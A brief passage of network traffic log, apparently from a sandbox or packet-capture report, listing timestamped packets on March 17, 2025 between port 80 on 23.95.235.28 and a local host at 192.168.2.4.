                                                                                        Mar 17, 2025 01:19:04.412270069 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412285089 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412316084 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412332058 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412360907 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412373066 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412384033 CET804972423.95.235.28192.168.2.4